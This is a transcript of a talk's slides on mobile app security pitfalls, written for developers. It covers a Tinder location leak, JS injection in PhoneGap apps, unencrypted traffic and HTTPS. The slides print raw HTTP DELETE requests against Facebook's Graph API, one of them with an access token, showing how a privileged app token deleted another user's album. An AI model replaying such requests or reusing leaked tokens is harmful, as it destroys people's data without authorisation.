mobile app security best practices
TRANSCRIPT
![Page 1: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/1.jpg)
Mobile Security PitfallsCommon goofs we make and how to avoid them
Ynon Perek
tocode.co.il
![Page 2: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/2.jpg)
You Don’t Need To Be a Hacker
✤ Bug -> Vulnerability -> Exploit
✤ Hackers use exploits
✤ We’ll focus on fixing bugs
![Page 3: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/3.jpg)
Types of Vulnerabilities
Platform
Application ServerCommunicationTechnical
Human Factor
Platform
![Page 4: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/4.jpg)
Need To Protect…
✤ Our own private data
✤ Server
✤ Application secrets
✤ Our user’s private data
![Page 5: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/5.jpg)
Guidelines: Server
✤ Assume Evil Teddy Bear is writing your client app
✤ Now write the server
![Page 6: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/6.jpg)
Common Security Pitfalls - Server
✤ Trusting client application with too much data
✤ Leaving secrets in application source code
✤ Leaving server unprotected
![Page 7: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/7.jpg)
Demo: Tinder Location Bug
![Page 8: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/8.jpg)
Demo: Tinder Location Bug
"birth_date": "1992-06-24T00:00:00.000Z", "gender": 1, "name": "Daisie", "pos": { "lon": -73.9977375759311, "lat": 40.72255556095288 }, "fbId": "185"
![Page 9: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/9.jpg)
And the fix ???
"photos":[ ... ],"id":"52617e698525596018001418","common_friends":[],"common_likes":[ ],"common_like_count":0,"common_friend_count":0,"distance_mi":4.760408451724539
![Page 10: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/10.jpg)
Found Ya!
![Page 11: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/11.jpg)
How I Hacked Your Facebook Photos
Request :-DELETE /518171421550249 HTTP/1.1Host : graph.facebook.comContent-Length: 245access_token=CAACEdEose0cBAABAXPPuULhNCsYZA2cgSbajNEV99ZCHXoNPvp6LqgHmTNYvuNt3e5DD4wZA1eAMflPMCAGKVlaDbJQXPZAWqd3vkaAy9VvQnxyECVD0DYOpWm3we0X3lp6ZB0hlaSDSkbcilmKYLAzQ6ql1ChyViTiSH1ZBvrjZAH3RQoova87KKsGJT3adTVZBaDSIZAYxRzCNtAC0SZCMzKAyCfXXy4RMUZD
Response :-{"error":{"message":"(#200) Application does not have the capability to make this API call.","type":"OAuthException","code":200}}
![Page 12: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/12.jpg)
Now let’s try with FB for Android token …
Request :-DELETE /518171421550249 HTTP/1.1Host : graph.facebook.comContent-Length: 245access_token=<Facebook_for_Android_Access_Token>
Response :-true
![Page 13: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/13.jpg)
Interesting, Now let’s try another album…
Request :-DELETE /518171421550249 HTTP/1.1Host : graph.facebook.comContent-Length: 245access_token=<Facebook_for_Android_Access_Token>
Response :-true
OMG! Album Got Deleted
![Page 14: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/14.jpg)
Bug Bounty Programs
https://hackerone.com/
![Page 15: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/15.jpg)
Getting It Wrong: Parse Todo App
http://code.tutsplus.com/tutorials/getting-started-with-parse--net-28000
![Page 16: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/16.jpg)
Getting It Right: Parse Todo App
http://todolist.parseapp.com/#
![Page 17: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/17.jpg)
And now for the client
Platform
Application ServerCommunicationTechnical
Human Factor
Platform
![Page 18: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/18.jpg)
Guidelines: Client app
✤ Assume phone was hijacked by evil teddy bear
✤ Assume server was hacked by evil teddy bear
✤ Assume all external data is fed in by evil teddy bear
![Page 19: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/19.jpg)
Apple Storing Location Data in iOS4
What makes this issue worse is that the file is unencrypted and unprotected, and it’s on any machine you’ve synched with your iOS device…
http://radar.oreilly.com/2011/04/apple-location-tracking.html
![Page 20: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/20.jpg)
JS Code Injections
Evil Hacker
Honest User
Web Application
(Email)
Send message to honest user
Message includes evil JS code
![Page 21: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/21.jpg)
Why Is It Bad?
✤ PhoneGap apps provide no protection against evil JS
✤ Can use all device capabilities
![Page 22: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/22.jpg)
JS Code Injections - PhoneGap
✤ WiFi network names
✤ QR Code
✤ NFC
✤ SMS
✤ Address Book
✤ iFrames
![Page 23: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/23.jpg)
Communication Layer
Platform
Application ServerCommunicationTechnical
Human Factor
Platform
![Page 24: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/24.jpg)
Guidelines: Communication
✤ Oh no evil teddy bear PWNS the router
✤ Encrypted
✤ Authenticated
✤ Tamper proof
✤ => HTTPS
![Page 25: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/25.jpg)
Remember Firesheep?
![Page 26: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/26.jpg)
Demo: Listening on unencrypted mobile traffic using a proxy
![Page 27: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/27.jpg)
Q & A
![Page 28: Mobile App Security Best Practices](https://reader033.vdocuments.mx/reader033/viewer/2022042701/55a61b141a28abbb098b4746/html5/thumbnails/28.jpg)
Thanks For Listening
✤ Ynon Perek
✤ tocode.co.il